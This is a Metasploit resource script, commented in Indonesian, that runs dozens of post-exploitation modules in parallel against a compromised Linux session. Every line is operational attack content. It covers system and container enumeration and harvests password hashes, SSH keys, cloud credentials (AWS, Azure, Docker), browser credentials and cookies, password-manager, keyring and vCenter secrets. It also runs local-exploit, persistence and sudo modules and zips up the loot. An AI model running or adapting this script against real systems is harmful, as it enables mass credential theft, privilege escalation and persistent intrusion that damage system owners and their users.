# Optimized for Parallel Execution - Farrel
spool /root/msf_parallel_post_$(date +%Y%m%d_%H%M%S).log
setg LogLevel 5
set TimestampOutput true

# Set SESSION secara global agar semua modul otomatis menggunakannya
setg SESSION 1

echo "[*] MULAI PARALLEL MODE - Menjalankan modul sebagai background jobs"
echo "[*] Pastikan koneksi session stabil!"

# =============================================
# Grup 1: Basic Enumeration (Paralel)
# =============================================
use post/linux/gather/enum_system; run -j
use post/linux/gather/enum_network; run -j
use post/linux/gather/enum_configs; run -j
use post/linux/gather/enum_users_history; run -j
use post/linux/gather/enum_commands; run -j
use post/linux/gather/enum_protections; run -j
use post/linux/gather/checkvm; run -j
use post/linux/gather/checkcontainer; run -j
use post/linux/gather/enum_containers; run -j
use post/multi/gather/env; run -j

# Beri jeda sedikit agar job tidak menumpuk terlalu ekstrem di awal
sleep 3

# =============================================
# Grup 2: Credential Harvesting Utama (Paralel)
# =============================================
use post/linux/gather/hashdump; run -j
use post/multi/gather/ssh_creds; run -j
use post/multi/gather/aws_keys; run -j
use post/multi/gather/netrc_creds; run -j
use post/multi/gather/fetchmailrc_creds; run -j
use post/multi/gather/gpg_creds; run -j
use post/multi/gather/firefox_creds; run -j
use post/multi/gather/chrome_cookies; run -j
use post/multi/gather/thunderbird_creds; run -j
use post/multi/gather/filezilla_client_cred; run -j

# =============================================
# Grup 3: Creds Spesifik & Apps (Paralel)
# =============================================
use post/multi/gather/azure_cli_creds; run -j
use post/multi/gather/docker_creds; run -j
use post/multi/gather/pgpass_creds; run -j
use post/multi/gather/remmina_creds; run -j
use post/linux/gather/openvpn_credentials; run -j
use post/linux/gather/pptpd_chap_secrets; run -j
use post/linux/gather/enum_psk; run -j
use post/linux/gather/mount_cifs_creds; run -j
use post/multi/gather/tomcat_gather; run -j
use post/multi/gather/jboss_gather; run -j
use post/multi/gather/jenkins_gather; run -j
use post/multi/gather/lastpass_creds; run -j
use post/linux/gather/vcenter_secrets_dump; run -j
use post/linux/gather/f5_loot_mcp; run -j
use post/linux/gather/rancher_audit_log_leak; run -j
use post/linux/gather/gnome_keyring_dump; run -j

# =============================================
# Grup 4: Recon & Suggester (Paralel)
# =============================================
use post/multi/gather/dbeaver; run -j
use post/multi/gather/electerm; run -j
use post/linux/gather/enum_nagios_xi; run -j
use post/multi/recon/local_exploit_suggester; run -j
use post/multi/recon/persistence_suggester; run -j
use post/multi/recon/sudo_commands; run -j
use post/multi/manage/sudo; run -j

# =============================================
# Grup 5: Manage & Utility (Paralel)
# =============================================
use post/multi/manage/zip; run -j
use post/multi/manage/set_wallpaper; run -j
use post/multi/general/execute; run -j

echo "[*] SEMUA JOB TELAH DIANTREKAN (QUEUED)"
echo "[*] Gunakan perintah 'jobs -l' untuk memantau proses"
echo "[*] Gunakan perintah 'sessions -i 1' jika ingin kembali ke shell"

spool off
